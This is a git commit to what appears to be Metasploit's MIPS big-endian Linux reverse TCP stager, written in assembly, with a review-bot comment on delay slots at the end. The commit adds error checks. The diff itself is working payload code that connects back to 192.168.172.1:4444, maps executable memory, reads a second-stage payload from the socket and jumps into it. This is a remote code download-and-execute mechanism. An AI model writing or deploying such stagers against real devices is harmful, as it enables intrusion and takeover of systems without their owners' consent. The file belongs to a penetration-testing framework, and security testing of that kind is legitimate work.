fix reverse tcp stager src

tkmru
2017-07-05 17:56:59 +09:00
parent d1f08a80bd
commit d02d6826a9
2 changed files with 27 additions and 7 deletions
@@ -4,7 +4,7 @@
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Big Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
# License:
#
# This file is part of the Metasploit Exploit Framework
@@ -29,12 +29,11 @@
##
.text
.align 2
.globl main
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
@@ -47,8 +46,9 @@ main:
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
slt $s0, $zero, $a3
bne $s0, $zero, failed
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
@@ -69,6 +69,8 @@ main:
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
slt $s0, $zero, $a3
bne $s0, $zero, failed
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
@@ -92,7 +94,8 @@ main:
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
slt $s0, $zero, $a3
bne $s0, $zero, failed
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
@@ -106,6 +109,8 @@ main:
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
slt $s0, $zero, $a3
bne $s0, $zero, failed
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
@@ -119,11 +124,20 @@ main:
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
slt $s0, $zero, $a3
bne $s0, $zero, failed
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp)
jalr $s1
failed:
# exit(status)
# a0: status
# v0: syscall = __NR_exit (4001)
li $a0, 1
li $v0, 4001
syscall 0x40404
.set macro
.set reorder
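Review bot: The new error checks and the `failed:` block in the last hunk lack comments in two places where the behaviour is not obvious from the mnemonics. The code is assembled under `.set noreorder`, so the instruction after each `bne $s0, $zero, failed` and after `jalr $s1` runs in the delay slot. As rendered here, `li $a0, 1` at `failed:` directly follows `jalr $s1`, so it also executes on the success path and overwrites $a0 before control transfers. I would add `# delay slot of jalr: also runs on the success path, clobbers $a0` on that line, and `# $a3 != 0 after a syscall means the kernel reported an error (Linux/MIPS o32)` above the first `slt $s0, $zero, $a3`. The same `slt`/`bne` pair repeats after connect, mmap, read and cacheflush, and the delay-slot instructions for the connect and read checks lie outside the visible hunks, so confirm they are harmless when the branch is taken.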